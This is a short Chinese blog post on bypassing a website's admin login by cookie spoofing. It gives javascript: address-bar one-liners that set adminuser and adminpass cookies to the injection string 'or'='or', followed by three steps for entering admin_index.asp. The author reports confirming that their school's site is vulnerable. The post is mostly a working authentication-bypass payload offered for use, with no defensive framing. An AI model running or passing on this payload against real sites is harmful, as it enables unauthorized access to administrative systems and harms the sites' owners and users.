cookie欺骗登录网站后台

javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));javascript:alert (document.cookie="adminpass="+escape("'or'='or'"));javascript:alert (document.cookie="admindj="+escape("1")); 

知识的海洋真是无穷尽的,关键是找到适合自己的位置,并努力做好它。

今天听同学说可以采用cookie欺骗方式登录网站的后台管理系统,具有此漏洞的网站可以采用这个方式进入,学校的的网站证实也存在此漏洞。记录如下:

方法如下,1,打开后台管理页面。

2,将上述javascript代码输入到浏览器地址栏中。

3,在域名后面输入admin_index.asp页面,成功进入。


  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值